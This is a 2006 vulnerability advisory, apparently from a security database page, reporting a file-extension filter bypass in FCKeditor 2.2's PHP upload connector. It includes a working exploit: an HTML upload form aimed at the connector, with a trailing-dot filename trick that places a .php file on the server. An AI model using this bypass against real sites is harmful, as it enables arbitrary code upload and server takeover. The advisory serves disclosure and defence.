Vulnerability FCKeditor 2.2

2006.02.24
Credit: NSA Group
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

Advisory: NSAG-&#185;196-23.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: FCKeditor 2.2 Site of manufacturer: http://www.fckeditor.net The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 21/02/2006 - Answer of the manufacturer is absent. 21/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/893.html Risk: Critical Description: Detour of a filtration of expansions of files is possible. Influence: Loading of the forbidden files on target system. Exploit: <form action="http://host/filemanager/browser/default/connectors/php/connector .php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data"> File Upload<br> <input id="txtFileUpload" type="file" name="NewFile"> <br> <input type="submit" value="Upload"> </form> In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.) As a result on a server the file testfile.php will be created Decision: The decision from the manufacturer is not known. Contact us and receive consultations. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Our company is the independent auditor of the software in market IT. At present independent audit of the software becomes the standard practice and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors! www.nsag.ru ?Nemesis? &#169; 2006 ------------------------------------ Nemesis Security Audit Group &#169; 2006.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top